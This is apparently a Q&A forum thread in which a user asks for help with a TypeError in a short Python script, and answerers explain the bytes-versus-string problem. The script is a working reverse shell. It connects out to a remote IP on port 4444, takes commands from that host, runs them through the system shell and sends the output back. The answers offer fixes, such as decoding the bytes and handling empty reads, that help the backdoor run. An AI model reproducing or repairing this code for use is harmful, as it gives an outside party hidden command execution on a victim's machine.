# TypeError: argument of type 'int' is not iterable when implementing socket program

Tags: python

[Full error list](https://i.stack.imgur.com/F8KYw.png)Just help me solve this error, please 
I have just added a random IP for security reasons the problem is in the while loop.
Here is the python code in which I'm getting an error:

```
import socket, subprocess

def execute_system_command(command):
  return subprocess.check_output(command, shell=True)

connection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect(("1.2.3.4",4444)) 

connection.send(b"\n[+] Connection established.\n")

while True:
  command = connection.recv(1024)
  command_result = execute_system_command(command)
  connection.send(command_result)

connection.close()
```

Comment: you need to provide your stacktrace for the error

Comment: I have posted it.

Answer (score 0):

```
command = connection.recv(1024)
```

This line gets a `bytes` object from the connection, which you then pass into your `execute_system_command` function:

```
execute_system_command(command)
```

And in that function, you pass the `bytes` object to the `args` positional argument of `subprocess.check_output`:

```
def execute_system_command(command):
  return subprocess.check_output(command, shell=True)
```

But `args` which should either be a string, or an iterable of arguments https://docs.python.org/2/library/subprocess.html#frequently-used-arguments. Check what gets assigned to `command` and you'll probably find your issue.

Comment: command variable gets a system command such as dir, whoami, ipconfig

Comment: If you're confident that's the actual value of `command`, then you should just use `return subprocess.check_output(command.decode(), shell=True)` instead - but this only works for single word commands, you may want to look at it a bit more carefully.

Comment: I have created a listener and once the connection is established then I want to execute system commands. The connection gets established but once I pass the system commands the listener gets a output like this b ' ' and the TypeError is returned

Comment: Since your code cannot deal with the empty `bytes` sequence `b''`, it terminates - you should check for the empty sequence, pass on it and read again.

Answer (score -2):

You should share the error image if possible with line number. I think you should use "1024" with connection.recv.

Comment: please do not use answer as comment.